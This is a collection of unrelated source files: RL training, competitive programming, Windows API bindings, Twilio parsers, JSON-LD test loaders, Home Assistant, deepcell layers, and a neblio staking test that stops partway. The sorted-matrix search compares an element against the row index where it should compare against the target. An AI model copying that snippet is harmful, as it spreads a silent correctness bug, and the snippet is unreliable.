if num_env_steps > config['num_warmup_steps']:
actor_learner.learn_from_experience()
torch.save( # save the best DQN model overall (gave the highest reward in an episode)
utils.get_training_state(config, actor_learner.best_dqn_model),
os.path.join(BINARIES_PATH, utils.get_available_binary_name(config['env_id']))
)
def get_training_args():
parser = argparse.ArgumentParser()
# Training related
parser.add_argument("--seed", type=int, help="Very important for reproducibility - set the random seed", default=23)
parser.add_argument("--env_id", type=str, help="Atari game id", default='BreakoutNoFrameskip-v4')
parser.add_argument("--num_of_training_steps", type=int, help="Number of training env steps", default=50000000)
parser.add_argument("--acting_learning_step_ratio", type=int, help="Number of experience collection steps for every learning step", default=4)
parser.add_argument("--learning_rate", type=float, default=1e-4)
parser.add_argument("--grad_clipping_value", type=float, default=5) # 5 is fairly arbitrarily chosen
parser.add_argument("--replay_buffer_size", type=int, help="Number of frames to store in buffer", default=1000000)
parser.add_argument("--dont_crash_if_no_mem", action='store_false', help="Optimization - crash if not enough RAM before the training even starts (default=True)")
parser.add_argument("--num_warmup_steps", type=int, help="Number of steps before learning starts", default=50000)
parser.add_argument("--target_dqn_update_interval", type=int, help="Target DQN update freq per learning update", default=10000)
parser.add_argument("--batch_size", type=int, help="Number of states in a batch (from replay buffer)", default=32)
parser.add_argument("--gamma", type=float, help="Discount factor", default=0.99)
parser.add_argument("--tau", type=float, help='Set to 1 for a hard target DQN update, < 1 for a soft one', default=1.)
# epsilon-greedy annealing params
parser.add_argument("--epsilon_start_value", type=float, default=1.)
parser.add_argument("--epsilon_end_value", type=float, default=0.1)
parser.add_argument("--epsilon_duration", type=int, default=1000000)
# Logging/debugging/checkpoint related (helps a lot with experimentation)
parser.add_argument("--console_log_freq", type=int, help="Log to console after this many env steps (None = no logging)", default=10000)
parser.add_argument("--log_freq", type=int, help="Log metrics to tensorboard after this many env steps (None = no logging)", default=10000)
parser.add_argument("--episode_log_freq", type=int, help="Log metrics to tensorboard after this many episodes (None = no logging)", default=5)
parser.add_argument("--checkpoint_freq", type=int, help="Save checkpoint model after this many env steps (None = no checkpointing)", default=10000)
parser.add_argument("--grads_log_freq", type=int, help="Log grad norms after this many weight update steps (None = no logging)", default=2500)
parser.add_argument("--debug", action='store_true', help='Train in debugging mode')
args = parser.parse_args()
# Wrapping training configuration into a dictionary
training_config = dict()
for arg in vars(args):
training_config[arg] = getattr(args, arg)
return training_config
if __name__ == '__main__':
# Train the DQN model
train_dqn(get_training_args())
|
atcoder/abc102/b.py | Ashindustry007/competitive-programming | 506 | 12670210 | #!/usr/bin/env python3
# https://abc102.contest.atcoder.jp/tasks/abc102_b
n = int(input())
a = [int(x) for x in input().split()]
a.sort()
print(a[-1] - a[0])
|
windows/winproxy/apis/ktmw32.py | IMULMUL/PythonForWindows | 479 | 12670220 | <filename>windows/winproxy/apis/ktmw32.py
import ctypes
import windows.generated_def as gdef
from ..apiproxy import ApiProxy, NeededParameter
from ..error import fail_on_zero
class Ktmw32Proxy(ApiProxy):
APIDLL = "Ktmw32"
default_error_check = staticmethod(fail_on_zero)
@Ktmw32Proxy()
def CommitTransaction(TransactionHandle):
return CommitTransaction.ctypes_function(TransactionHandle)
@Ktmw32Proxy()
def CreateTransaction(lpTransactionAttributes, UOW, CreateOptions, IsolationLevel, IsolationFlags, Timeout, Description):
return CreateTransaction.ctypes_function(lpTransactionAttributes, UOW, CreateOptions, IsolationLevel, IsolationFlags, Timeout, Description)
@Ktmw32Proxy()
def RollbackTransaction(TransactionHandle):
return RollbackTransaction.ctypes_function(TransactionHandle)
@Ktmw32Proxy()
def OpenTransaction(dwDesiredAccess, TransactionId):
return OpenTransaction.ctypes_function(dwDesiredAccess, TransactionId)
|
algoexpert.io/python/Search_In_Sorted_Matrix.py | XSoyOscar/Algorithms | 713 | 12670271 | <reponame>XSoyOscar/Algorithms
# https://www.algoexpert.io/questions/Search%20In%20Sorted%20Matrix
# O(n + m) time | O(1) space
# where 'n' is the length of row and 'm' is the length on column
def search_in_sorted_matrix(matrix, target):
row = 0
col = len(matrix[0]) - 1
while row < len(matrix) and col >= 0:
if matrix[row][col] > target:
col -= 1
elif matrix[row][col] < row:
row += 1
else:
return [row, col]
return [-1, -1]
|
SpoTwillio/lib/python3.6/site-packages/twilio/base/deserialize.py | Natfan/funlittlethings | 1,362 | 12670315 | import datetime
from decimal import Decimal, BasicContext
from email.utils import parsedate
import pytz
ISO8601_DATE_FORMAT = '%Y-%m-%d'
ISO8601_DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
def iso8601_date(s):
"""
Parses an ISO 8601 date string and returns a UTC date object or the string
if the parsing failed.
:param s: ISO 8601-formatted date string (2015-01-25)
:return:
"""
try:
return datetime.datetime.strptime(s, ISO8601_DATE_FORMAT).replace(tzinfo=pytz.utc).date()
except (TypeError, ValueError):
return s
def iso8601_datetime(s):
"""
Parses an ISO 8601 datetime string and returns a UTC datetime object,
or the string if parsing failed.
:param s: ISO 8601-formatted datetime string (2015-01-25T12:34:56Z)
:return: datetime or str
"""
try:
return datetime.datetime.strptime(s, ISO8601_DATETIME_FORMAT).replace(tzinfo=pytz.utc)
except (TypeError, ValueError):
return s
def rfc2822_datetime(s):
"""
Parses an RFC 2822 date string and returns a UTC datetime object,
or the string if parsing failed.
:param s: RFC 2822-formatted string date
:return: datetime or str
"""
date_tuple = parsedate(s)
if date_tuple is None:
return None
return datetime.datetime(*date_tuple[:6]).replace(tzinfo=pytz.utc)
def decimal(d):
"""
Parses a decimal string into a Decimal
:param d: decimal string
:return: Decimal
"""
if not d:
return d
return Decimal(d, BasicContext)
def integer(i):
"""
Parses an integer string into an int
:param i: integer string
:return: int
"""
try:
return int(i)
except (TypeError, ValueError):
return i
|
securityheaders/checkers/infourlcollector.py | th3cyb3rc0p/securityheaders | 151 | 12670357 | <reponame>th3cyb3rc0p/securityheaders<gh_stars>100-1000
#Collects all used URLs in a policy
from securityheaders.checkers import InfoCollector, Finding, FindingType, FindingSeverity
from securityheaders.models import ModelFactory
class InfoURLCollector(InfoCollector):
def check(self, headers, opt_options=dict()):
findings = []
headernames = ModelFactory().getheadernames()
for header in headernames:
hdr = ModelFactory().getheader(header)
try:
obj = self.extractheader(headers, hdr)
if obj and obj.parsedstring:
if hasattr(obj, 'getdirectives') and hasattr(obj,'geturls'):
for directive in obj.getdirectives():
urls = obj.geturls([directive])
if not urls:
urls = []
for url in urls:
findings.append(Finding(obj.headerkey, FindingType.INFO_URL, str(url), FindingSeverity.NONE, directive, str(url) ))
except:
pass
return findings
|
aries_cloudagent/messaging/jsonld/tests/document_loader.py | kuraakhilesh8230/aries-cloudagent-python | 247 | 12670388 | from ....vc.tests.contexts import (
CITIZENSHIP_V1,
CREDENTIALS_V1,
EXAMPLES_V1,
ODRL,
SCHEMA_ORG,
SECURITY_V1,
SECURITY_V2,
)
from . import (
TEST_EURO_HEALTH,
TEST_SIGN_OBJ0,
TEST_SIGN_OBJ1,
TEST_SIGN_OBJ2,
TEST_VALIDATE_ERROR_OBJ2,
TEST_VERIFY_ERROR,
TEST_VERIFY_OBJ0,
TEST_VERIFY_OBJ1,
TEST_VERIFY_OBJ2,
)
DOCUMENTS = {
TEST_SIGN_OBJ0["doc"]["id"]: TEST_SIGN_OBJ0["doc"],
TEST_SIGN_OBJ1["doc"]["id"]: TEST_SIGN_OBJ1["doc"],
TEST_VERIFY_ERROR["doc"]["id"]: TEST_VERIFY_ERROR["doc"],
TEST_VERIFY_OBJ0["doc"]["id"]: TEST_VERIFY_OBJ0["doc"],
TEST_VERIFY_OBJ1["doc"]["id"]: TEST_VERIFY_OBJ1["doc"],
"https://w3id.org/citizenship/v1": CITIZENSHIP_V1,
"https://www.w3.org/2018/credentials/v1": CREDENTIALS_V1,
"https://www.w3.org/2018/credentials/examples/v1": EXAMPLES_V1,
"https://www.w3.org/ns/odrl.jsonld": ODRL,
"http://schema.org/": SCHEMA_ORG,
"https://w3id.org/security/v1": SECURITY_V1,
"https://w3id.org/security/v2": SECURITY_V2,
(
"https://essif-lab.pages.grnet.gr/interoperability/"
"eidas-generic-use-case/contexts/ehic-v1.jsonld"
): TEST_EURO_HEALTH,
}
def custom_document_loader(url: str, options: dict):
# Check if full url (with fragments is in document map)
if url in DOCUMENTS:
return {
"contentType": "application/ld+json",
"contextUrl": None,
"document": DOCUMENTS[url],
"documentUrl": url,
}
# Otherwise look if it is present without fragment
without_fragment = url.split("#")[0]
if without_fragment in DOCUMENTS:
return {
"contentType": "application/ld+json",
"contextUrl": None,
"document": DOCUMENTS[without_fragment],
"documentUrl": url,
}
raise Exception(f"No custom context support for {url}")
|
MicroTokenizer/cli/commands/train.py | howl-anderson/MicroTokenizer | 136 | 12670435 | from MicroTokenizer.training.train import train_from_configure
def train(output_dir, train_data, configure_file=None):
train_from_configure([train_data], output_dir, configure_file=configure_file)
if __name__ == "__main__":
import plac
print(plac.call(train))
|
examples/io_examples/pyglet_imshow.py | penguinflys/imgviz | 171 | 12670498 | <reponame>penguinflys/imgviz
#!/usr/bin/env python
import imgviz
def get_images():
data = imgviz.data.arc2017()
yield data["rgb"]
yield imgviz.depth2rgb(data["depth"], min_value=0.3, max_value=1)
yield imgviz.label2rgb(data["class_label"])
def main():
imgviz.io.pyglet_imshow(next(get_images()), "ndarray")
imgviz.io.pyglet_run()
imgviz.io.pyglet_imshow(get_images(), "generator")
imgviz.io.pyglet_run()
imgviz.io.pyglet_imshow(list(get_images()), "list")
imgviz.io.pyglet_run()
if __name__ == "__main__":
main()
|
homeassistant/components/directv/entity.py | MrDelik/core | 30,023 | 12670528 | """Base DirecTV Entity."""
from __future__ import annotations
from directv import DIRECTV
from homeassistant.helpers.entity import DeviceInfo, Entity
from .const import DOMAIN
class DIRECTVEntity(Entity):
"""Defines a base DirecTV entity."""
def __init__(self, *, dtv: DIRECTV, address: str = "0") -> None:
"""Initialize the DirecTV entity."""
self._address = address
self._device_id = address if address != "0" else dtv.device.info.receiver_id
self._is_client = address != "0"
self.dtv = dtv
@property
def device_info(self) -> DeviceInfo:
"""Return device information about this DirecTV receiver."""
return DeviceInfo(
identifiers={(DOMAIN, self._device_id)},
manufacturer=self.dtv.device.info.brand,
name=self.name,
sw_version=self.dtv.device.info.version,
via_device=(DOMAIN, self.dtv.device.info.receiver_id),
)
|
deepcell/layers/location.py | jizhouh/deepcell-tf | 250 | 12670556 | # Copyright 2016-2021 The <NAME> at the California Institute of
# Technology (Caltech), with support from the Paul Allen Family Foundation,
# Google, & National Institutes of Health (NIH) under Grant U24CA224309-01.
# All rights reserved.
#
# Licensed under a modified Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.github.com/vanvalenlab/deepcell-tf/LICENSE
#
# The Work provided may be used for non-commercial academic purposes only.
# For any other use of the Work, including commercial use, please contact:
# <EMAIL>
#
# Neither the name of Caltech nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Layers to encode location data"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Layer
from tensorflow.python.keras.utils import conv_utils
from tensorflow.python.framework import tensor_shape
logger = tf.get_logger()
class Location2D(Layer):
"""Location Layer for 2D cartesian coordinate locations.
Args:
data_format (str): A string, one of ``channels_last`` (default)
or ``channels_first``. The ordering of the dimensions in the
inputs. ``channels_last`` corresponds to inputs with shape
``(batch, height, width, channels)`` while ``channels_first``
corresponds to inputs with shape
``(batch, channels, height, width)``.
"""
def __init__(self, data_format=None, **kwargs):
in_shape = kwargs.pop('in_shape', None)
if in_shape is not None:
logger.warn('in_shape (from deepcell.layerse.location) is '
'deprecated and will be removed in a future version.')
super(Location2D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
channel_axis = 1 if self.data_format == 'channels_first' else 3
input_shape[channel_axis] = 2
return tensor_shape.TensorShape(input_shape)
def call(self, inputs):
input_shape = K.shape(inputs)
if self.data_format == 'channels_first':
x = K.arange(0, input_shape[2], dtype=inputs.dtype)
y = K.arange(0, input_shape[3], dtype=inputs.dtype)
else:
x = K.arange(0, input_shape[1], dtype=inputs.dtype)
y = K.arange(0, input_shape[2], dtype=inputs.dtype)
x = x / K.max(x)
y = y / K.max(y)
loc_x, loc_y = tf.meshgrid(x, y, indexing='ij')
if self.data_format == 'channels_first':
loc = K.stack([loc_x, loc_y], axis=0)
else:
loc = K.stack([loc_x, loc_y], axis=-1)
location = K.expand_dims(loc, axis=0)
if self.data_format == 'channels_first':
location = K.permute_dimensions(location, pattern=[0, 2, 3, 1])
location = tf.tile(location, [input_shape[0], 1, 1, 1])
if self.data_format == 'channels_first':
location = K.permute_dimensions(location, pattern=[0, 3, 1, 2])
return location
def get_config(self):
config = {
'data_format': self.data_format
}
base_config = super(Location2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Location3D(Layer):
"""Location Layer for 3D cartesian coordinate locations.
Args:
data_format (str): A string, one of ``channels_last`` (default)
or ``channels_first``. The ordering of the dimensions in the
inputs. ``channels_last`` corresponds to inputs with shape
``(batch, height, width, channels)`` while ``channels_first``
corresponds to inputs with shape
``(batch, channels, height, width)``.
"""
def __init__(self, data_format=None, **kwargs):
in_shape = kwargs.pop('in_shape', None)
if in_shape is not None:
logger.warn('in_shape (from deepcell.layerse.location) is '
'deprecated and will be removed in a future version.')
super(Location3D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
channel_axis = 1 if self.data_format == 'channels_first' else 4
input_shape[channel_axis] = 3
return tensor_shape.TensorShape(input_shape)
def call(self, inputs):
input_shape = K.shape(inputs)
if self.data_format == 'channels_first':
z = K.arange(0, input_shape[2], dtype=inputs.dtype)
x = K.arange(0, input_shape[3], dtype=inputs.dtype)
y = K.arange(0, input_shape[4], dtype=inputs.dtype)
else:
z = K.arange(0, input_shape[1], dtype=inputs.dtype)
x = K.arange(0, input_shape[2], dtype=inputs.dtype)
y = K.arange(0, input_shape[3], dtype=inputs.dtype)
x = x / K.max(x)
y = y / K.max(y)
z = z / K.max(z)
loc_z, loc_x, loc_y = tf.meshgrid(z, x, y, indexing='ij')
if self.data_format == 'channels_first':
loc = K.stack([loc_z, loc_x, loc_y], axis=0)
else:
loc = K.stack([loc_z, loc_x, loc_y], axis=-1)
location = K.expand_dims(loc, axis=0)
if self.data_format == 'channels_first':
location = K.permute_dimensions(location, pattern=[0, 2, 3, 4, 1])
location = tf.tile(location, [input_shape[0], 1, 1, 1, 1])
if self.data_format == 'channels_first':
location = K.permute_dimensions(location, pattern=[0, 4, 1, 2, 3])
return location
def get_config(self):
config = {
'data_format': self.data_format
}
base_config = super(Location3D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
|
test/python/tests/test_collect.py | bh107/bohrium | 236 | 12670676 | <gh_stars>100-1000
import util
class test_collect:
def init(self):
for t in util.TYPES.ALL:
cmd = "a = M.arange(%d, dtype=%s); " % (100, t)
yield cmd
def test_contract(self, cmd):
cmd += "res = a / 180.0 * 3.14"
return cmd
def test_contract_reverse(self, cmd):
cmd += "res = a * 3.14 / 180.0"
return cmd
|
tools/HackRF/firmware/tools/dumb_crc32.py | Charmve/BLE-Security-Att-Def | 149 | 12670693 | <filename>tools/HackRF/firmware/tools/dumb_crc32.py
class DumbCRC32(object):
def __init__(self):
self._remainder = 0xffffffff
self._reversed_polynomial = 0xedb88320
self._final_xor = 0xffffffff
def update(self, data):
bit_count = len(data) * 8
for bit_n in range(bit_count):
bit_in = data[bit_n >> 3] & (1 << (bit_n & 7))
self._remainder ^= 1 if bit_in != 0 else 0
bit_out = (self._remainder & 1)
self._remainder >>= 1;
if bit_out != 0:
self._remainder ^= self._reversed_polynomial;
def digest(self):
return self._remainder ^ self._final_xor
def hexdigest(self):
return '%08x' % self.digest()
|
anomalib/models/reverse_distillation/anomaly_map.py | openvinotoolkit/anomalib | 689 | 12670715 | """Compute Anomaly map."""
# Original Code
# Copyright (c) 2022 hq-deng
# https://github.com/hq-deng/RD4AD
# SPDX-License-Identifier: MIT
#
# Modified
# Copyright (C) 2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from typing import List, Tuple, Union
import torch
import torch.nn.functional as F
from kornia.filters import gaussian_blur2d
from omegaconf import ListConfig
from torch import Tensor
class AnomalyMapGenerator:
"""Generate Anomaly Heatmap.
Args:
image_size (Union[ListConfig, Tuple]): Size of original image used for upscaling the anomaly map.
sigma (int): Standard deviation of the gaussian kernel used to smooth anomaly map.
mode (str, optional): Operation used to generate anomaly map. Options are `add` and `multiply`.
Defaults to "multiply".
Raises:
ValueError: In case modes other than multiply and add are passed.
"""
def __init__(self, image_size: Union[ListConfig, Tuple], sigma: int = 4, mode: str = "multiply"):
self.image_size = image_size if isinstance(image_size, tuple) else tuple(image_size)
self.sigma = sigma
self.kernel_size = 2 * int(4.0 * sigma + 0.5) + 1
if mode not in ("add", "multiply"):
raise ValueError(f"Found mode {mode}. Only multiply and add are supported.")
self.mode = mode
def __call__(self, student_features: List[Tensor], teacher_features: List[Tensor]) -> Tensor:
"""Computes anomaly map given encoder and decoder features.
Args:
student_features (List[Tensor]): List of encoder features
teacher_features (List[Tensor]): List of decoder features
Returns:
Tensor: Anomaly maps of length batch.
"""
if self.mode == "multiply":
anomaly_map = torch.ones(
[student_features[0].shape[0], 1, *self.image_size], device=student_features[0].device
) # b c h w
elif self.mode == "add":
anomaly_map = torch.zeros(
[student_features[0].shape[0], 1, *self.image_size], device=student_features[0].device
)
for student_feature, teacher_feature in zip(student_features, teacher_features):
distance_map = 1 - F.cosine_similarity(student_feature, teacher_feature)
distance_map = torch.unsqueeze(distance_map, dim=1)
distance_map = F.interpolate(distance_map, size=self.image_size, mode="bilinear", align_corners=True)
if self.mode == "multiply":
anomaly_map *= distance_map
elif self.mode == "add":
anomaly_map += distance_map
anomaly_map = gaussian_blur2d(
anomaly_map, kernel_size=(self.kernel_size, self.kernel_size), sigma=(self.sigma, self.sigma)
)
return anomaly_map
|
plugins/cleanup_untagged/test/test_config.py | someengineering/resoto | 126 | 12670748 | from resotolib.config import Config
from resoto_plugin_cleanup_untagged import CleanupUntaggedPlugin
def test_config():
config = Config("dummy", "dummy")
CleanupUntaggedPlugin.add_config(config)
Config.init_default_config()
assert Config.plugin_cleanup_untagged.enabled is False
assert (
Config.plugin_cleanup_untagged.validate(Config.plugin_cleanup_untagged) is True
)
|
tests/test_visualization.py | frankiert/layout-parser | 2,931 | 12670803 | <reponame>frankiert/layout-parser<gh_stars>1000+
# Copyright 2021 The Layout Parser team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from layoutparser.elements import *
from layoutparser.ocr import *
from layoutparser.visualization import *
import cv2
import numpy as np
def test_viz():
image = cv2.imread("tests/fixtures/ocr/test_gcv_image.jpg")
ocr_agent = GCVAgent.with_credential(
"tests/fixtures/ocr/test_gcv_credential.json", languages=["en"]
)
res = ocr_agent.load_response("tests/fixtures/ocr/test_gcv_response.json")
draw_box(image, Layout([]))
draw_text(image, Layout([]))
draw_box(
image,
Layout(
[
Interval(0, 10, axis="x"),
Rectangle(0, 50, 100, 80),
Quadrilateral(np.array([[10, 10], [30, 40], [90, 40], [10, 20]])),
]
),
)
draw_text(
image,
Layout(
[
Interval(0, 10, axis="x"),
Rectangle(0, 50, 100, 80),
Quadrilateral(np.array([[10, 10], [30, 40], [90, 40], [10, 20]])),
]
),
)
for idx, level in enumerate(
[
GCVFeatureType.SYMBOL,
GCVFeatureType.WORD,
GCVFeatureType.PARA,
GCVFeatureType.BLOCK,
GCVFeatureType.PAGE,
]
):
layout = ocr_agent.gather_full_text_annotation(res, level)
draw_text(
image,
layout,
arrangement="ud" if idx % 2 else "ud",
font_size=15,
text_color="pink",
text_background_color="grey",
text_background_alpha=0.1,
with_box_on_text=True,
text_box_width=2,
text_box_color="yellow",
text_box_alpha=0.2,
with_layout=True,
box_width=1,
color_map={None: "blue"},
show_element_id=True,
id_font_size=8,
box_alpha=0.25,
id_text_background_alpha=0.25
)
draw_box(image, layout)
draw_text(image, layout) |
test/functional/feature_pos.py | HUSKI3/Neblio-Node | 138 | 12670810 | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test staking in neblio
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.messages import *
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 6
self.extra_args = [[], [], [], [], [], []]
def setup_network(self, split=False):
super().setup_network()
def progress_mock_time(self, by_how_many_seconds):
assert self.curr_time is not None
self.curr_time += by_how_many_seconds
for n in self.nodes:
n.setmocktime(self.curr_time)
def reset_mock_time(self, value=None):
for n in self.nodes:
if value is None:
self.curr_time = int(time.time())
n.setmocktime(self.curr_time)
else:
assert type(value) == int
self.curr_time = value
n.setmocktime(self.curr_time)
def gen_pos_block(self, node_number, max_retries=10, average_block_time=STAKE_TARGET_SPACING, block_time_spread=10):
r = random.randrange(-block_time_spread, block_time_spread + 1)
self.progress_mock_time(average_block_time - self.last_random_time_offset + r)
self.last_random_time_offset = r
balance = self.nodes[node_number].getbalance()
if balance == 0:
raise ValueError("Node has no balance to stake")
for i in range(max_retries):
hashes = self.nodes[node_number].generatepos(1)
if len(hashes) > 0:
return hashes[0]
else:
# we progress in time to provide some window for nSearchTime vs nLastCoinStakeSearchTime
self.progress_mock_time(1)
raise CalledProcessError("Failed to stake. Max tries limit reached.")
def gen_pow_block(self, node_number, average_block_time, block_time_spread):
hashes = self.nodes[node_number].generate(1)
assert_equal(len(hashes), 1)
r = random.randrange(-block_time_spread, block_time_spread + 1)
self.progress_mock_time(average_block_time - self.last_random_time_offset + r)
self.last_random_time_offset = r
return hashes[0]
def create_tx_with_output_amounts(self, available_outputs, addresses_vs_amounts, fee=Decimal('0.1')):
total_output_amount = fee
for addr in addresses_vs_amounts:
total_output_amount += addresses_vs_amounts[addr]
total_input = 0
utxos_to_be_used = []
for input in available_outputs:
if total_input < total_output_amount:
if input['confirmations'] > COINBASE_MATURITY:
utxos_to_be_used.append(input)
total_input += input['amount']
else:
break
if total_input < total_output_amount:
logger.info("Attempting to reach value: {}".format(total_output_amount))
logger.info("Available outputs: {}".format(available_outputs))
raise ValueError("Total input could not reach the required output. Find available outputs above.")
tx_inputs = []
for input in utxos_to_be_used:
tx_inputs.append({"txid": input['txid'], "vout": input['vout']})
tx_outputs = addresses_vs_amounts
return self.nodes[0].createrawtransaction(tx_inputs, tx_outputs)
def run_test(self):
self.sync_all()
self.reset_mock_time()
self.last_random_time_offset = 0
block_time_spread = 10
average_block_time = 30
for i in range(100): # mine 100 blocks, we reduce the amount per call to avoid timing out
hash = self.gen_pow_block(0, average_block_time, block_time_spread)
# find the output that has the genesis block reward
listunspent = self.nodes[0].listunspent()
genesis_utxo = None
for utxo_data in listunspent:
if utxo_data['amount'] == Decimal('124000000.00000000'):
genesis_utxo = utxo_data
break
assert genesis_utxo is not None
# Create outputs in nodes[1] to stake them
inputs = [{"txid": genesis_utxo['txid'], "vout": genesis_utxo['vout']}]
outputs = {}
outputs_count = 220
for i in range(outputs_count):
outputs[self.nodes[1].getnewaddress()] = 500
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
signedRawTx = self.nodes[0].signrawtransaction(rawTx)
self.nodes[0].sendrawtransaction(signedRawTx['hex'])
# Create outputs in nodes[2] to stake them
for i in range(100): # mine 100 blocks
hash = self.gen_pow_block(0, average_block_time, block_time_spread)
self.sync_all()
# Here we create the outputs in nodes[2] that should be combined
n2_addr = self.nodes[2].getnewaddress()
n2_utxos_to_combine_in_stake = 10
n2_amount_per_address = Decimal('110')
# the condition for combination; utxos will be added until we reach 'STAKE_COMBINE_THRESHOLD' nebls
# note: The outcome can be > STAKE_COMBINE_THRESHOLD
assert (n2_utxos_to_combine_in_stake - 1) * n2_amount_per_address <= STAKE_COMBINE_THRESHOLD
for i in range(n2_utxos_to_combine_in_stake):
addresses_vs_amounts_node2 = {n2_addr: n2_amount_per_address}
tx_for_n2 = self.create_tx_with_output_amounts(self.nodes[0].listunspent(), addresses_vs_amounts_node2)
signed_tx_for_n2 = self.nodes[0].signrawtransaction(tx_for_n2)
self.nodes[0].sendrawtransaction(signed_tx_for_n2['hex'])
# Here we create the outputs in nodes[2] that should be combined, except for one output
n3_addr = self.nodes[3].getnewaddress()
n3_utxos_to_combine_in_stake = 10 # the amount we expect to be combined
n3_amount_per_address = Decimal('120')
# the condition for combination; utxos will be added until we reach 'STAKE_COMBINE_THRESHOLD' nebls
# note: The outcome can be > STAKE_COMBINE_THRESHOLD
assert (n3_utxos_to_combine_in_stake - 1) * n3_amount_per_address > STAKE_COMBINE_THRESHOLD
for i in range(n3_utxos_to_combine_in_stake):
addresses_vs_amounts_node3 = {n3_addr: n3_amount_per_address}
tx_for_n3 = self.create_tx_with_output_amounts(self.nodes[0].listunspent(), addresses_vs_amounts_node3)
signed_tx_for_n3 = self.nodes[0].signrawtransaction(tx_for_n3)
self.nodes[0].sendrawtransaction(signed_tx_for_n3['hex'])
for i in range(800): # mine 800 blocks
hash = self.gen_pow_block(0, average_block_time, block_time_spread)
self.sync_all()
n1_balance_before = self.nodes[1].getbalance()
n2_balance_before = self.nodes[2].getbalance()
n3_balance_before = self.nodes[3].getbalance()
# move to the future to make coins stakable (this is not needed because 10 minutes is too short)
# self.progress_mock_time(60*10)
block_count_to_stake = 30
# We can't stake more than the outputs we have
assert block_count_to_stake <= outputs_count
assert_equal(len(self.nodes[1].generatepos(1)), 0)
for i in range(block_count_to_stake):
hash = self.gen_pos_block(1)
self.sync_all()
# check that the total number of blocks is the PoW mined + PoS mined
for n in self.nodes:
assert_equal(n.getblockcount(), 1000 + block_count_to_stake)
# test that combining stakes below the threshold STAKE_COMBINE_THRESHOLD will combine them
balance_before = self.nodes[2].getbalance()
assert_equal(balance_before, n2_utxos_to_combine_in_stake * n2_amount_per_address)
hash_n2 = self.gen_pos_block(2)
self.sync_all()
# we expect all inputs to be joined in one stake, so the remaining confirmed amount is zero
balance_after = self.nodes[2].getbalance()
assert_equal(balance_after, Decimal('0'))
staked_block_in_n2 = self.nodes[2].getblock(hash_n2, True, True)
# in the staked block, transaction 1 has 'n3_amount_per_address' inputs,
# which are all combined to create this stake
# Combined because the age > STAKE_SPLIT_AGE and the total amount is < STAKE_COMBINE_THRESHOLD
assert_equal(len(staked_block_in_n2['tx'][1]['vin']), n2_utxos_to_combine_in_stake)
#
# test that combining stakes above the threshold STAKE_COMBINE_THRESHOLD will combine them up to that threshold
balance_before = self.nodes[3].getbalance()
assert_equal(balance_before, n3_utxos_to_combine_in_stake * n3_amount_per_address)
hash_n3 = self.gen_pos_block(3)
self.sync_all()
# we expect all inputs to be joined in one stake, except for one output
balance_after = self.nodes[3].getbalance()
# since we're a tick over the threshold, we expect one utxo to be left unspent in staking
assert_equal(balance_after, n3_amount_per_address)
staked_block_in_n3 = self.nodes[3].getblock(hash_n3, True, True)
# in the staked block, transaction 1 has 'n3_amount_per_address' inputs,
# which are all combined to create this stake
# Combined because the age > STAKE_SPLIT_AGE and the total amount is < STAKE_COMBINE_THRESHOLD
assert_equal(len(staked_block_in_n3['tx'][1]['vin']), n3_utxos_to_combine_in_stake - 1)
# ensure that the desired output has value in it
assert staked_block_in_n3['tx'][1]['vout'][1]['value'] > 0
# attempt to send the staked nebls before they mature (to nodes[0])
inputs = [{"txid": staked_block_in_n3['tx'][1]['txid'], "vout": 1}]
outputs = {self.nodes[0].getnewaddress(): 20}
test_maturity_rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
test_maturity_signed_rawtx = self.nodes[3].signrawtransaction(test_maturity_rawtx)
for node in self.nodes: # spending stake before maturity should be rejected in all nodes
assert_raises_rpc_error(-26, "bad-txns-premature-spend-of-coinstake", node.sendrawtransaction, test_maturity_signed_rawtx['hex'])
# we stake blocks that total to 'COINBASE_MATURITY' blocks, and the staked block to mature
for i in range(COINBASE_MATURITY):
# it should not be possible to submit the transaction until the maturity is reached
assert_raises_rpc_error(-26, "bad-txns-premature-spend-of-coinstake", self.nodes[0].sendrawtransaction,
test_maturity_signed_rawtx['hex'])
hash = self.gen_pos_block(0)
self.sync_all()
for node in self.nodes: # spending that stake should be accepted in all nodes after maturity
node.sendrawtransaction(test_maturity_signed_rawtx['hex'])
self.sync_all()
n4_addr = self.nodes[4].getnewaddress()
n4_utxos_to_split_in_stake = 1 # the amount we expect to be combined
n4_amount_per_address = Decimal('2000')
# the condition for combination; utxos will be added until we reach 'STAKE_COMBINE_THRESHOLD' nebls
# note: The outcome can be > STAKE_COMBINE_THRESHOLD
for i in range(n4_utxos_to_split_in_stake):
addresses_vs_amounts_node3 = {n4_addr: n4_amount_per_address}
